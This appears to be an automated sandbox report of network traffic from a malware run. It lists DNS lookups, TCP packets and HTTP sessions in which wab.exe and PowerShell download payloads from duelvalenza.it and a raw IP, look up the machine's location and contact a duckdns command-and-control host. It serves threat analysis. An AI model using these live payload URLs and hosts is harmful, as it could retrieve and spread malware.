                                              Apr 26, 2024 07:40:47.163018942 CEST804971987.121.105.163192.168.2.5
                                              Apr 26, 2024 07:40:47.163032055 CEST804971987.121.105.163192.168.2.5
                                              Apr 26, 2024 07:40:47.163096905 CEST804971987.121.105.163192.168.2.5
                                              Apr 26, 2024 07:40:47.163110018 CEST804971987.121.105.163192.168.2.5
                                              Apr 26, 2024 07:40:47.163166046 CEST804971987.121.105.163192.168.2.5
                                              Apr 26, 2024 07:40:47.163178921 CEST804971987.121.105.163192.168.2.5
                                              Apr 26, 2024 07:40:47.163212061 CEST804971987.121.105.163192.168.2.5
                                              Apr 26, 2024 07:40:47.163269043 CEST804971987.121.105.163192.168.2.5
                                              Apr 26, 2024 07:40:47.163333893 CEST804971987.121.105.163192.168.2.5
                                              Apr 26, 2024 07:40:47.163346052 CEST804971987.121.105.163192.168.2.5
                                              Apr 26, 2024 07:40:47.163378000 CEST804971987.121.105.163192.168.2.5
                                              Apr 26, 2024 07:40:47.163395882 CEST804971987.121.105.163192.168.2.5
                                              Apr 26, 2024 07:40:47.163424969 CEST804971987.121.105.163192.168.2.5
                                              Apr 26, 2024 07:40:47.163506031 CEST804971987.121.105.163192.168.2.5
                                              Apr 26, 2024 07:40:47.163551092 CEST804971987.121.105.163192.168.2.5
                                              Apr 26, 2024 07:40:47.163563967 CEST804971987.121.105.163192.168.2.5
                                              Apr 26, 2024 07:40:47.163575888 CEST804971987.121.105.163192.168.2.5
                                              Apr 26, 2024 07:40:47.163589001 CEST804971987.121.105.163192.168.2.5
                                              Apr 26, 2024 07:40:47.163666964 CEST804971987.121.105.163192.168.2.5
                                              Apr 26, 2024 07:40:47.163680077 CEST804971987.121.105.163192.168.2.5
                                              Apr 26, 2024 07:40:47.163707972 CEST804971987.121.105.163192.168.2.5
                                              Apr 26, 2024 07:40:47.163719893 CEST804971987.121.105.163192.168.2.5
                                              Apr 26, 2024 07:40:47.163743019 CEST804971987.121.105.163192.168.2.5
                                              Apr 26, 2024 07:40:47.163796902 CEST804971987.121.105.163192.168.2.5
                                              Apr 26, 2024 07:40:47.163824081 CEST804971987.121.105.163192.168.2.5
                                              Apr 26, 2024 07:40:47.163852930 CEST804971987.121.105.163192.168.2.5
                                              Apr 26, 2024 07:40:47.163870096 CEST804971987.121.105.163192.168.2.5
                                              Apr 26, 2024 07:40:47.163897991 CEST804971987.121.105.163192.168.2.5
                                              Apr 26, 2024 07:40:47.163954973 CEST804971987.121.105.163192.168.2.5
                                              Apr 26, 2024 07:40:47.163969040 CEST804971987.121.105.163192.168.2.5
                                              Apr 26, 2024 07:40:47.163981915 CEST804971987.121.105.163192.168.2.5
                                              Apr 26, 2024 07:40:47.163994074 CEST804971987.121.105.163192.168.2.5
                                              Apr 26, 2024 07:40:47.166137934 CEST4971980192.168.2.587.121.105.163
                                              Apr 26, 2024 07:40:47.166193962 CEST4971980192.168.2.587.121.105.163
                                              Apr 26, 2024 07:40:47.267539024 CEST497163050192.168.2.545.88.90.110
                                              Apr 26, 2024 07:40:47.389777899 CEST804971987.121.105.163192.168.2.5
                                              Apr 26, 2024 07:40:47.389797926 CEST804971987.121.105.163192.168.2.5
                                              Apr 26, 2024 07:40:47.389811993 CEST804971987.121.105.163192.168.2.5
                                              Apr 26, 2024 07:40:47.389863014 CEST4971980192.168.2.587.121.105.163
                                              Apr 26, 2024 07:40:47.389920950 CEST804971987.121.105.163192.168.2.5
                                              Apr 26, 2024 07:40:47.389934063 CEST804971987.121.105.163192.168.2.5
                                              Apr 26, 2024 07:40:47.389945984 CEST804971987.121.105.163192.168.2.5
                                              Apr 26, 2024 07:40:47.389957905 CEST804971987.121.105.163192.168.2.5
                                              Apr 26, 2024 07:40:47.389965057 CEST4971980192.168.2.587.121.105.163
                                              Apr 26, 2024 07:41:13.904397011 CEST804972287.121.105.163192.168.2.5
                                              Apr 26, 2024 07:41:13.904403925 CEST4972280192.168.2.587.121.105.163
                                              Apr 26, 2024 07:41:13.904428959 CEST4972280192.168.2.587.121.105.163
                                              Apr 26, 2024 07:41:13.904470921 CEST4972280192.168.2.587.121.105.163
                                              Apr 26, 2024 07:41:13.904521942 CEST804972287.121.105.163192.168.2.5
                                              Apr 26, 2024 07:41:13.904536963 CEST804972287.121.105.163192.168.2.5
                                              Apr 26, 2024 07:41:13.904551983 CEST804972287.121.105.163192.168.2.5
                                              Apr 26, 2024 07:41:13.904573917 CEST4972280192.168.2.587.121.105.163
                                              Apr 26, 2024 07:41:13.904587984 CEST4972280192.168.2.587.121.105.163
                                              Apr 26, 2024 07:41:13.904664993 CEST804972287.121.105.163192.168.2.5
                                              Apr 26, 2024 07:41:13.904679060 CEST804972287.121.105.163192.168.2.5
                                              Apr 26, 2024 07:41:13.904690981 CEST804972287.121.105.163192.168.2.5
                                              Apr 26, 2024 07:41:13.904705048 CEST804972287.121.105.163192.168.2.5
                                              Apr 26, 2024 07:41:13.904716969 CEST4972280192.168.2.587.121.105.163
                                              Apr 26, 2024 07:41:13.904726028 CEST804972287.121.105.163192.168.2.5
                                              Apr 26, 2024 07:41:13.904738903 CEST804972287.121.105.163192.168.2.5
                                              Apr 26, 2024 07:41:13.904747009 CEST4972280192.168.2.587.121.105.163
                                              Apr 26, 2024 07:41:13.904787064 CEST4972280192.168.2.587.121.105.163
                                              Apr 26, 2024 07:41:13.904804945 CEST804972287.121.105.163192.168.2.5
                                              Apr 26, 2024 07:41:13.904819965 CEST804972287.121.105.163192.168.2.5
                                              Apr 26, 2024 07:41:13.904851913 CEST4972280192.168.2.587.121.105.163
                                              Apr 26, 2024 07:41:13.904889107 CEST4972280192.168.2.587.121.105.163
                                              Apr 26, 2024 07:41:13.904997110 CEST804972287.121.105.163192.168.2.5
                                              Apr 26, 2024 07:41:13.905009985 CEST804972287.121.105.163192.168.2.5
                                              Apr 26, 2024 07:41:13.905023098 CEST804972287.121.105.163192.168.2.5
                                              Apr 26, 2024 07:41:13.905038118 CEST804972287.121.105.163192.168.2.5
                                              Apr 26, 2024 07:41:13.905044079 CEST4972280192.168.2.587.121.105.163
                                              Apr 26, 2024 07:41:13.905054092 CEST804972287.121.105.163192.168.2.5
                                              Apr 26, 2024 07:41:13.905076981 CEST4972280192.168.2.587.121.105.163
                                              Apr 26, 2024 07:41:13.905093908 CEST4972280192.168.2.587.121.105.163
                                              Apr 26, 2024 07:41:14.132783890 CEST804972287.121.105.163192.168.2.5
                                              Apr 26, 2024 07:41:14.132844925 CEST804972287.121.105.163192.168.2.5
                                              Apr 26, 2024 07:41:14.132900953 CEST4972280192.168.2.587.121.105.163
                                              Apr 26, 2024 07:41:14.132945061 CEST804972287.121.105.163192.168.2.5
                                              Apr 26, 2024 07:41:14.132976055 CEST4972280192.168.2.587.121.105.163
                                              Apr 26, 2024 07:41:14.133037090 CEST4972280192.168.2.587.121.105.163
                                              Apr 26, 2024 07:41:14.133063078 CEST804972287.121.105.163192.168.2.5
                                              Apr 26, 2024 07:41:14.133126020 CEST4972280192.168.2.587.121.105.163
                                              Apr 26, 2024 07:41:14.133133888 CEST804972287.121.105.163192.168.2.5
                                              Apr 26, 2024 07:41:14.133183002 CEST804972287.121.105.163192.168.2.5
                                              Apr 26, 2024 07:41:14.133219004 CEST4972280192.168.2.587.121.105.163
                                              Apr 26, 2024 07:41:14.133239985 CEST804972287.121.105.163192.168.2.5
                                              Apr 26, 2024 07:41:14.133255005 CEST4972280192.168.2.587.121.105.163
                                              Apr 26, 2024 07:41:14.133301020 CEST4972280192.168.2.587.121.105.163
                                              Apr 26, 2024 07:41:14.133307934 CEST804972287.121.105.163192.168.2.5
                                              Apr 26, 2024 07:41:14.133368969 CEST4972280192.168.2.587.121.105.163
                                              Apr 26, 2024 07:41:14.133642912 CEST804972287.121.105.163192.168.2.5
                                              Apr 26, 2024 07:41:14.133713961 CEST804972287.121.105.163192.168.2.5
                                              Apr 26, 2024 07:41:14.133714914 CEST4972280192.168.2.587.121.105.163
                                              Apr 26, 2024 07:41:14.133766890 CEST804972287.121.105.163192.168.2.5
                                              Apr 26, 2024 07:41:14.133795977 CEST4972280192.168.2.587.121.105.163
                                              Apr 26, 2024 07:41:14.133810997 CEST804972287.121.105.163192.168.2.5
                                              Apr 26, 2024 07:41:14.133837938 CEST804972287.121.105.163192.168.2.5
                                              Apr 26, 2024 07:41:14.133858919 CEST4972280192.168.2.587.121.105.163
                                              Apr 26, 2024 07:41:14.133915901 CEST4972280192.168.2.587.121.105.163
                                              Apr 26, 2024 07:41:14.133919954 CEST804972287.121.105.163192.168.2.5
                                              Apr 26, 2024 07:41:14.133992910 CEST804972287.121.105.163192.168.2.5
                                              Apr 26, 2024 07:41:14.134021044 CEST4972280192.168.2.587.121.105.163
                                              Apr 26, 2024 07:41:14.134093046 CEST804972287.121.105.163192.168.2.5
                                              Apr 26, 2024 07:41:14.134107113 CEST4972280192.168.2.587.121.105.163
                                              Apr 26, 2024 07:41:14.134162903 CEST4972280192.168.2.587.121.105.163
                                              Apr 26, 2024 07:41:14.134171009 CEST804972287.121.105.163192.168.2.5
                                              Apr 26, 2024 07:41:14.134231091 CEST4972280192.168.2.587.121.105.163
                                              Apr 26, 2024 07:41:14.134238958 CEST804972287.121.105.163192.168.2.5
                                              Apr 26, 2024 07:41:14.134310007 CEST4972280192.168.2.587.121.105.163
                                              Apr 26, 2024 07:41:14.134408951 CEST804972287.121.105.163192.168.2.5
                                              Apr 26, 2024 07:41:14.134454012 CEST804972287.121.105.163192.168.2.5
                                              Apr 26, 2024 07:41:14.134479046 CEST4972280192.168.2.587.121.105.163
                                              Apr 26, 2024 07:41:14.134516001 CEST804972287.121.105.163192.168.2.5
                                              Apr 26, 2024 07:41:14.134537935 CEST4972280192.168.2.587.121.105.163
                                              Apr 26, 2024 07:41:14.134574890 CEST804972287.121.105.163192.168.2.5
                                              Apr 26, 2024 07:41:14.134594917 CEST4972280192.168.2.587.121.105.163
                                              Apr 26, 2024 07:41:14.134639978 CEST804972287.121.105.163192.168.2.5
                                              Apr 26, 2024 07:41:14.134649992 CEST4972280192.168.2.587.121.105.163
                                              Apr 26, 2024 07:41:14.134685993 CEST804972287.121.105.163192.168.2.5
                                              Apr 26, 2024 07:41:14.134706020 CEST4972280192.168.2.587.121.105.163
                                              Apr 26, 2024 07:41:14.134738922 CEST804972287.121.105.163192.168.2.5
                                              Apr 26, 2024 07:41:14.134763956 CEST4972280192.168.2.587.121.105.163
                                              Apr 26, 2024 07:41:14.134814978 CEST4972280192.168.2.587.121.105.163
                                              Apr 26, 2024 07:41:14.134884119 CEST804972287.121.105.163192.168.2.5
                                              Apr 26, 2024 07:41:14.134962082 CEST4972280192.168.2.587.121.105.163
                                              Apr 26, 2024 07:41:14.134984970 CEST804972287.121.105.163192.168.2.5
                                              Apr 26, 2024 07:41:14.135060072 CEST4972280192.168.2.587.121.105.163
                                              Apr 26, 2024 07:41:14.135101080 CEST804972287.121.105.163192.168.2.5
                                              Apr 26, 2024 07:41:14.135153055 CEST804972287.121.105.163192.168.2.5
                                              Apr 26, 2024 07:41:14.135174036 CEST4972280192.168.2.587.121.105.163
                                              Apr 26, 2024 07:41:14.135238886 CEST4972280192.168.2.587.121.105.163
                                              Apr 26, 2024 07:41:14.135456085 CEST804972287.121.105.163192.168.2.5
                                              Apr 26, 2024 07:41:14.135533094 CEST4972280192.168.2.587.121.105.163
                                              Apr 26, 2024 07:41:14.135545015 CEST804972287.121.105.163192.168.2.5
                                              Apr 26, 2024 07:41:14.135607004 CEST4972280192.168.2.587.121.105.163
                                              Apr 26, 2024 07:41:14.135792017 CEST804972287.121.105.163192.168.2.5
                                              Apr 26, 2024 07:41:14.135864019 CEST4972280192.168.2.587.121.105.163
                                              Apr 26, 2024 07:41:14.135901928 CEST804972287.121.105.163192.168.2.5
                                              Apr 26, 2024 07:41:14.135967970 CEST4972280192.168.2.587.121.105.163
                                              Apr 26, 2024 07:41:14.136039019 CEST804972287.121.105.163192.168.2.5
                                              Apr 26, 2024 07:41:14.136118889 CEST4972280192.168.2.587.121.105.163
                                              Apr 26, 2024 07:41:14.136152029 CEST804972287.121.105.163192.168.2.5
                                              Apr 26, 2024 07:41:14.136235952 CEST4972280192.168.2.587.121.105.163
                                              Apr 26, 2024 07:41:14.136276960 CEST804972287.121.105.163192.168.2.5
                                              Apr 26, 2024 07:41:14.136336088 CEST4972280192.168.2.587.121.105.163
                                              Apr 26, 2024 07:41:14.136360884 CEST804972287.121.105.163192.168.2.5
                                              Apr 26, 2024 07:41:14.136423111 CEST4972280192.168.2.587.121.105.163
                                              Apr 26, 2024 07:41:14.136428118 CEST804972287.121.105.163192.168.2.5
                                              Apr 26, 2024 07:41:14.136519909 CEST804972287.121.105.163192.168.2.5
                                              Apr 26, 2024 07:41:14.136526108 CEST4972280192.168.2.587.121.105.163
                                              Apr 26, 2024 07:41:14.136540890 CEST804972287.121.105.163192.168.2.5
                                              Apr 26, 2024 07:41:14.136584044 CEST4972280192.168.2.587.121.105.163
                                              Apr 26, 2024 07:41:14.136622906 CEST804972287.121.105.163192.168.2.5
                                              Apr 26, 2024 07:41:14.136642933 CEST4972280192.168.2.587.121.105.163
                                              Apr 26, 2024 07:41:14.136667013 CEST804972287.121.105.163192.168.2.5
                                              Apr 26, 2024 07:41:14.136697054 CEST4972280192.168.2.587.121.105.163
                                              Apr 26, 2024 07:41:14.136722088 CEST804972287.121.105.163192.168.2.5
                                              Apr 26, 2024 07:41:14.136754990 CEST4972280192.168.2.587.121.105.163
                                              Apr 26, 2024 07:41:14.136780977 CEST804972287.121.105.163192.168.2.5
                                              Apr 26, 2024 07:41:14.136807919 CEST4972280192.168.2.587.121.105.163
                                              Apr 26, 2024 07:41:14.136863947 CEST4972280192.168.2.587.121.105.163
                                              Apr 26, 2024 07:41:14.137031078 CEST804972287.121.105.163192.168.2.5
                                              Apr 26, 2024 07:41:14.137103081 CEST804972287.121.105.163192.168.2.5
                                              Apr 26, 2024 07:41:14.137104034 CEST4972280192.168.2.587.121.105.163
                                              Apr 26, 2024 07:41:14.137164116 CEST4972280192.168.2.587.121.105.163
                                              Apr 26, 2024 07:41:14.137173891 CEST804972287.121.105.163192.168.2.5
                                              Apr 26, 2024 07:41:14.137223005 CEST804972287.121.105.163192.168.2.5
                                              Apr 26, 2024 07:41:14.137231112 CEST4972280192.168.2.587.121.105.163
                                              Apr 26, 2024 07:41:14.137238979 CEST804972287.121.105.163192.168.2.5
                                              Apr 26, 2024 07:41:14.137278080 CEST4972280192.168.2.587.121.105.163
                                              Apr 26, 2024 07:41:14.137305021 CEST804972287.121.105.163192.168.2.5
                                              Apr 26, 2024 07:41:14.137332916 CEST4972280192.168.2.587.121.105.163
                                              Apr 26, 2024 07:41:14.137372971 CEST804972287.121.105.163192.168.2.5
                                              Apr 26, 2024 07:41:14.137387991 CEST4972280192.168.2.587.121.105.163
                                              Apr 26, 2024 07:41:14.137424946 CEST804972287.121.105.163192.168.2.5
                                              Apr 26, 2024 07:41:14.137443066 CEST4972280192.168.2.587.121.105.163
                                              Apr 26, 2024 07:41:14.137499094 CEST4972280192.168.2.587.121.105.163
                                              Apr 26, 2024 07:41:14.137525082 CEST804972287.121.105.163192.168.2.5
                                              Apr 26, 2024 07:41:14.137571096 CEST804972287.121.105.163192.168.2.5
                                              Apr 26, 2024 07:41:14.137587070 CEST4972280192.168.2.587.121.105.163
                                              Apr 26, 2024 07:41:14.137592077 CEST804972287.121.105.163192.168.2.5
                                              Apr 26, 2024 07:41:14.137640953 CEST4972280192.168.2.587.121.105.163
                                              Apr 26, 2024 07:41:14.137695074 CEST804972287.121.105.163192.168.2.5
                                              Apr 26, 2024 07:41:14.137696028 CEST4972280192.168.2.587.121.105.163
                                              Apr 26, 2024 07:41:14.137792110 CEST4972280192.168.2.587.121.105.163
                                              Apr 26, 2024 07:41:14.137800932 CEST804972287.121.105.163192.168.2.5
                                              Apr 26, 2024 07:41:14.137867928 CEST4972280192.168.2.587.121.105.163
                                              Apr 26, 2024 07:41:14.138036013 CEST804972287.121.105.163192.168.2.5
                                              Apr 26, 2024 07:41:14.138096094 CEST804972287.121.105.163192.168.2.5
                                              Apr 26, 2024 07:41:14.138108969 CEST804972287.121.105.163192.168.2.5
                                              Apr 26, 2024 07:41:14.138113022 CEST4972280192.168.2.587.121.105.163
                                              Apr 26, 2024 07:41:14.138175011 CEST4972280192.168.2.587.121.105.163
                                              Apr 26, 2024 07:41:18.900118113 CEST804972287.121.105.163192.168.2.5
                                              Apr 26, 2024 07:41:18.900213003 CEST4972280192.168.2.587.121.105.163
                                              Apr 26, 2024 07:41:22.161393881 CEST804971987.121.105.163192.168.2.5
                                              Apr 26, 2024 07:41:29.079302073 CEST30504971545.88.90.110192.168.2.5
                                              Apr 26, 2024 07:41:29.080820084 CEST497153050192.168.2.545.88.90.110
                                              Apr 26, 2024 07:41:29.356333017 CEST30504971545.88.90.110192.168.2.5
                                              Apr 26, 2024 07:41:39.747267008 CEST4972280192.168.2.587.121.105.163
                                              Apr 26, 2024 07:41:48.602751970 CEST4972380192.168.2.5137.220.252.40
                                              Apr 26, 2024 07:41:48.887566090 CEST8049723137.220.252.40192.168.2.5
                                              Apr 26, 2024 07:41:48.889177084 CEST4972380192.168.2.5137.220.252.40
                                              Apr 26, 2024 07:41:48.924058914 CEST4972380192.168.2.5137.220.252.40
                                              Apr 26, 2024 07:41:49.208782911 CEST8049723137.220.252.40192.168.2.5
                                              Apr 26, 2024 07:41:49.208837032 CEST8049723137.220.252.40192.168.2.5
                                              Apr 26, 2024 07:41:49.208858013 CEST8049723137.220.252.40192.168.2.5
                                              Apr 26, 2024 07:41:49.209007978 CEST4972380192.168.2.5137.220.252.40
                                              Apr 26, 2024 07:41:49.234684944 CEST4972380192.168.2.5137.220.252.40
                                              Apr 26, 2024 07:41:49.519357920 CEST8049723137.220.252.40192.168.2.5
                                              Apr 26, 2024 07:41:59.470875025 CEST30504971545.88.90.110192.168.2.5
                                              Apr 26, 2024 07:41:59.474153042 CEST497153050192.168.2.545.88.90.110
                                              Apr 26, 2024 07:41:59.762612104 CEST30504971545.88.90.110192.168.2.5
| Timestamp | Source Port | Dest Port | Source IP | Dest IP |
|---|---|---|---|---|
| Apr 26, 2024 07:39:55.184778929 CEST | 62051 | 53 | 192.168.2.5 | 1.1.1.1 |
| Apr 26, 2024 07:39:55.670669079 CEST | 53 | 62051 | 1.1.1.1 | 192.168.2.5 |
| Apr 26, 2024 07:40:34.520668983 CEST | 55624 | 53 | 192.168.2.5 | 1.1.1.1 |
| Apr 26, 2024 07:40:35.165452957 CEST | 53 | 55624 | 1.1.1.1 | 192.168.2.5 |
| Apr 26, 2024 07:40:36.270385981 CEST | 61201 | 53 | 192.168.2.5 | 1.1.1.1 |
| Apr 26, 2024 07:40:36.661483049 CEST | 53 | 61201 | 1.1.1.1 | 192.168.2.5 |
| Apr 26, 2024 07:40:39.194423914 CEST | 50900 | 53 | 192.168.2.5 | 1.1.1.1 |
| Apr 26, 2024 07:40:39.863711119 CEST | 53 | 50900 | 1.1.1.1 | 192.168.2.5 |
| Apr 26, 2024 07:40:41.568718910 CEST | 59051 | 53 | 192.168.2.5 | 1.1.1.1 |
| Apr 26, 2024 07:40:41.694843054 CEST | 53 | 59051 | 1.1.1.1 | 192.168.2.5 |
| Apr 26, 2024 07:41:47.939328909 CEST | 60602 | 53 | 192.168.2.5 | 1.1.1.1 |
| Apr 26, 2024 07:41:48.560477972 CEST | 53 | 60602 | 1.1.1.1 | 192.168.2.5 |
| Apr 26, 2024 07:42:04.800548077 CEST | 54668 | 53 | 192.168.2.5 | 1.1.1.1 |
| Apr 26, 2024 07:42:05.295389891 CEST | 53 | 54668 | 1.1.1.1 | 192.168.2.5 |
| Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS |
|---|---|---|---|---|---|---|---|---|
| Apr 26, 2024 07:39:55.184778929 CEST | 192.168.2.5 | 1.1.1.1 | 0x16e4 | Standard query (0) | europrotectie.ro | A (IP address) | IN (0x0001) | false |
| Apr 26, 2024 07:40:34.520668983 CEST | 192.168.2.5 | 1.1.1.1 | 0x4755 | Standard query (0) | duelvalenza.it | A (IP address) | IN (0x0001) | false |
| Apr 26, 2024 07:40:36.270385981 CEST | 192.168.2.5 | 1.1.1.1 | 0x23f6 | Standard query (0) | www.duelvalenza.it | A (IP address) | IN (0x0001) | false |
| Apr 26, 2024 07:40:39.194423914 CEST | 192.168.2.5 | 1.1.1.1 | 0xf389 | Standard query (0) | jgbours284hawara01.duckdns.org | A (IP address) | IN (0x0001) | false |
| Apr 26, 2024 07:40:41.568718910 CEST | 192.168.2.5 | 1.1.1.1 | 0x3d3b | Standard query (0) | geoplugin.net | A (IP address) | IN (0x0001) | false |
| Apr 26, 2024 07:41:47.939328909 CEST | 192.168.2.5 | 1.1.1.1 | 0x2bfb | Standard query (0) | www.387mfyr.sbs | A (IP address) | IN (0x0001) | false |
| Apr 26, 2024 07:42:04.800548077 CEST | 192.168.2.5 | 1.1.1.1 | 0x89a3 | Standard query (0) | www.led-svitidla.eu | A (IP address) | IN (0x0001) | false |
| Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS |
|---|---|---|---|---|---|---|---|---|---|---|
| Apr 26, 2024 07:39:55.670669079 CEST | 1.1.1.1 | 192.168.2.5 | 0x16e4 | No error (0) | europrotectie.ro | | 188.212.111.134 | A (IP address) | IN (0x0001) | false |
| Apr 26, 2024 07:40:35.165452957 CEST | 1.1.1.1 | 192.168.2.5 | 0x4755 | No error (0) | duelvalenza.it | | 46.254.34.12 | A (IP address) | IN (0x0001) | false |
| Apr 26, 2024 07:40:36.661483049 CEST | 1.1.1.1 | 192.168.2.5 | 0x23f6 | No error (0) | www.duelvalenza.it | duelvalenza.it | | CNAME (Canonical name) | IN (0x0001) | false |
| Apr 26, 2024 07:40:36.661483049 CEST | 1.1.1.1 | 192.168.2.5 | 0x23f6 | No error (0) | duelvalenza.it | | 46.254.34.12 | A (IP address) | IN (0x0001) | false |
| Apr 26, 2024 07:40:39.863711119 CEST | 1.1.1.1 | 192.168.2.5 | 0xf389 | No error (0) | jgbours284hawara01.duckdns.org | | 45.88.90.110 | A (IP address) | IN (0x0001) | false |
| Apr 26, 2024 07:40:41.694843054 CEST | 1.1.1.1 | 192.168.2.5 | 0x3d3b | No error (0) | geoplugin.net | | 178.237.33.50 | A (IP address) | IN (0x0001) | false |
| Apr 26, 2024 07:41:48.560477972 CEST | 1.1.1.1 | 192.168.2.5 | 0x2bfb | No error (0) | www.387mfyr.sbs | | 137.220.252.40 | A (IP address) | IN (0x0001) | false |
| Apr 26, 2024 07:42:05.295389891 CEST | 1.1.1.1 | 192.168.2.5 | 0x89a3 | No error (0) | www.led-svitidla.eu | led-svitidla.eu | | CNAME (Canonical name) | IN (0x0001) | false |
| Apr 26, 2024 07:42:05.295389891 CEST | 1.1.1.1 | 192.168.2.5 | 0x89a3 | No error (0) | led-svitidla.eu | | 37.235.104.9 | A (IP address) | IN (0x0001) | false |
                                              • europrotectie.ro
                                              • duelvalenza.it
                                              • www.duelvalenza.it
                                              • geoplugin.net
                                              • 87.121.105.163
                                              • www.387mfyr.sbs
| Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
|---|---|---|---|---|---|---|
| 0 | 192.168.2.5 | 49714 | 46.254.34.12 | 80 | 1496 | C:\Program Files (x86)\Windows Mail\wab.exe |
Timestamp: Apr 26, 2024 07:40:36.912987947 CEST | Bytes transferred: 207 | Direction: OUT | Data:
GET /FIPWKWOaFXJGe178.bin HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Cache-Control: no-cache
Host: www.duelvalenza.it
Connection: Keep-Alive

Timestamp: Apr 26, 2024 07:40:37.165999889 CEST | Bytes transferred: 1289 | Direction: IN | Data:
HTTP/1.1 200 OK
Date: Fri, 26 Apr 2024 05:40:37 GMT
Server: Apache
Upgrade: h2,h2c
Connection: Upgrade, Keep-Alive
Last-Modified: Thu, 25 Apr 2024 07:57:39 GMT
ETag: "346314a-78c40-616e724193c2c"
Accept-Ranges: bytes
Content-Length: 494656
Cache-Control: max-age=5, public
Expires: Fri, 26 Apr 2024 05:40:42 GMT
Vary: Accept-Encoding
Keep-Alive: timeout=1, max=100
Content-Type: application/octet-stream
                                              Apr 26, 2024 07:40:37.166289091 CEST1289INData Raw: cb b6 92 c7 43 16 8b 2f e2 e4 7f 5e a7 4c 8b 00 34 29 d0 25 57 38 69 2c 72 4a 39 cd c7 9c b8 13 37 53 45 b1 9d 73 e5 fe 99 9d b5 e2 0f fa e9 7a 0d e7 37 06 05 98 36 c8 76 63 55 b4 55 04 7b c1 33 60 f2 ac 16 f4 4e a1 be ba 4b 16 3f 49 b3 01 c0 cc
                                              Data Ascii: C/^L4)%W8i,rJ97SEsz76vcUU{3`NK?Iv,fQ@/Shr~ST16If'2)$xD=A=Y[G])^ys(q %w<o]rx?u@P[lP#/1a4\TRQNX5L,`
                                              Apr 26, 2024 07:40:37.166328907 CEST1289INData Raw: 9c cf 14 1f 42 8d 31 ff 3c 84 b8 68 7e 79 ae 35 6c f6 93 62 07 2a 54 78 c9 4c 8f 73 09 89 a2 19 f4 67 12 97 5b a2 4a 33 e6 8d 48 c0 6c 66 c7 3c bc af a2 c6 11 30 bd 85 3c 7c 45 0d 5b fc 5c 63 b1 7d 4e 79 ef d9 6c 76 2d d3 ef 56 47 ef 97 cb 3f db
                                              Data Ascii: B1<h~y5lb*TxLsg[J3Hlf<0<|E[\c}Nylv-VG?4@QpxR<jTM')$Wnk,rEpEMNu{([LD;rp2or((srOV~/f@ Sr]|kYy_H!J-/XBW*
                                              Apr 26, 2024 07:40:37.166368008 CEST1289INData Raw: b2 cc 13 ac 5b d1 71 cb 2b aa 55 c1 51 c6 a4 7b ed bc bb 45 18 dc 7e a1 22 33 9c e1 58 ae 0f 6e 5e 4c a4 06 88 75 58 2e 40 c6 66 d5 36 d1 5a e0 e2 8e 41 e9 4c 4e 5c 87 68 1e af ba 72 7f 66 d6 35 af e4 83 30 e0 c7 e0 fc 17 59 9e 3e 66 b1 3b d7 2b
                                              Data Ascii: [q+UQ{E~"3Xn^LuX.@f6ZALN\hrf50Y>f;+[CagNGk=J<,u{ASv7>fL,vKlZJD'T/[Q@<gX,)NQ<DLKjTP3*4bbPIMv~CjSZqeyi0E~j-
                                              Apr 26, 2024 07:40:37.416367054 CEST1289INData Raw: aa 4c f0 c4 f2 fe cb 4d 28 33 53 db a5 1e ce 69 18 41 68 b6 21 54 48 77 15 dc f2 cf cb fe be 55 b5 0c 1f 9b c0 b5 40 4b e2 32 d7 bf 09 71 a0 d5 d3 f6 b9 97 27 d9 5d 7f f4 d1 15 1b ab 9c be e2 dd 92 cf 9b b6 74 95 06 fe c9 98 d7 78 ed 80 a6 39 08
                                              Data Ascii: LM(3SiAh!THwU@K2q']tx9beq%|G-El2NOrM_bIRkE(46D,+u4JE?pP`kNUARwkck\nlSm+e)i %C]


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              1 | 192.168.2.5 | 49718 | 178.237.33.50 | 80 | 1496 | C:\Program Files (x86)\Windows Mail\wab.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Apr 26, 2024 07:40:42.434660912 CEST | 71 | OUT | GET /json.gp HTTP/1.1
                                              Host: geoplugin.net
                                              Cache-Control: no-cache
                                              Apr 26, 2024 07:40:42.678834915 CEST | 1169 | IN | HTTP/1.1 200 OK
                                              date: Fri, 26 Apr 2024 05:40:42 GMT
                                              server: Apache
                                              content-length: 961
                                              content-type: application/json; charset=utf-8
                                              cache-control: public, max-age=300
                                              access-control-allow-origin: *
                                              Data Ascii: { "geoplugin_request":"102.129.152.220", "geoplugin_status":200, "geoplugin_delay":"1ms", "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.", "geoplugin_city":"Miami", "geoplugin_region":"Florida", "geoplugin_regionCode":"FL", "geoplugin_regionName":"Florida", "geoplugin_areaCode":"", "geoplugin_dmaCode":"528", "geoplugin_countryCode":"US", "geoplugin_countryName":"United States", "geoplugin_inEU":0, "geoplugin_euVATrate":false, "geoplugin_continentCode":"NA", "geoplugin_continentName":"North America", "geoplugin_latitude":"25.7689", "geoplugin_longitude":"-80.1946", "geoplugin_locationAccuracyRadius":"20", "geoplugin_timezone":"America\/New_York", "geoplugin_currencyCode":"USD", "geoplugin_currencySymbol":"$", "geoplugin_currencySymbol_UTF8":"$", "geoplugin_currencyConverter":0}


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              2 | 192.168.2.5 | 49719 | 87.121.105.163 | 80 | 5804 | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Apr 26, 2024 07:40:45.960474968 CEST | 174 | OUT | GET /Detentionen.java HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                              Host: 87.121.105.163
                                              Connection: Keep-Alive
                                              Apr 26, 2024 07:40:46.206590891 CEST | 1289 | IN | HTTP/1.1 200 OK
                                              Date: Fri, 26 Apr 2024 05:40:46 GMT
                                              Server: Apache/2.4.41 (Ubuntu)
                                              Last-Modified: Thu, 25 Apr 2024 09:04:48 GMT
                                              ETag: "6f080-616e8143c8c00"
                                              Accept-Ranges: bytes
                                              Content-Length: 454784
                                              Keep-Alive: timeout=5, max=100
                                              Connection: Keep-Alive
                                              Content-Type: text/x-java


